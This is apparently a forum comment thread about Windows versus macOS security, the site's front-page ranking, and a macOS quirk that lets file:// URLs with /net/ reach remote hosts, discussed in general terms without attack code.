Windows has a good handful of security vulnerabilities, but you'd be surprised by how few people actually "target" Windows devices. Windows still has accountability to their enterprise users, which means they spend most of their time mitigating the more serious stuff rather than some infected exe you'll find floating around the internet. MacOS and it's Unix heritage make it a pretty interesting case study for hackers, and while it may not have the perceived "hackability" of a Windows box, the severity of a MacOS exploit can vary greatly. Not to mention, Apple's reluctance to work with security researchers and opaque development cycle only make it harder for the end user to ascertain what impact MacOS has on their personal security.
I use neither of these operating systems on a daily basis, but I think you'd be surprised by how secure Windows is these days. It's by no means perfect, but it does a pretty good job of staying secure, even as the #1 desktop operating system in the world. Now if only Microsoft could make a secure desktop that was any good... wishful thinking.
Wow. I would have expected Android to be so much higher. For all the poorest people in the world who never owned a computer and have Internet access through an Android device, this is a great statistic.
Windows has a very good built-in antivirus now that protects you from pretty much all but 0-day vulnerabilities.
Really I don't think you can draw any big comparisons here anymore nowadays - Apple's security on mac OS is sandboxing and signing, the latter of which power users will have turned off and the prior being inapplicable in this case.
How does something like this wind up on the front page? As of this comment, it was posted 48 minutes ago with 12 points , one other comment, and sits at number 5. It's a self-professed clickbait title, though the content is interesting.
where 1.5 is a number that may change from time to time without warning, perhaps now it's 1.6 or something like that.
The number of comments does not matter, unless the post has too much more comment than points, and the site adds a penalty.
There are a lot of automatic and manual penalties added by the mods, and also added by the flags of the users. Most of the details are part of the secret sauce and change from time to time without warning.
Why not? You yourself just said "though the content is interesting." and the title might be a little clickbaity, but its not that bad. I've seen much worse reach the frontpage.
...but the fact that file:// schemes can access remote files by appending /net/ followed by a domain name is pretty shocking.
I mean, the entire purpose of "file://" would seem to be to provide access to local/mounted files and only those.
The fact that a Mac engineer thought it would be a great "feature" to allow file:// to access the entire internet is... kinda terrifying. Did that get patched, or was it only TextEdit?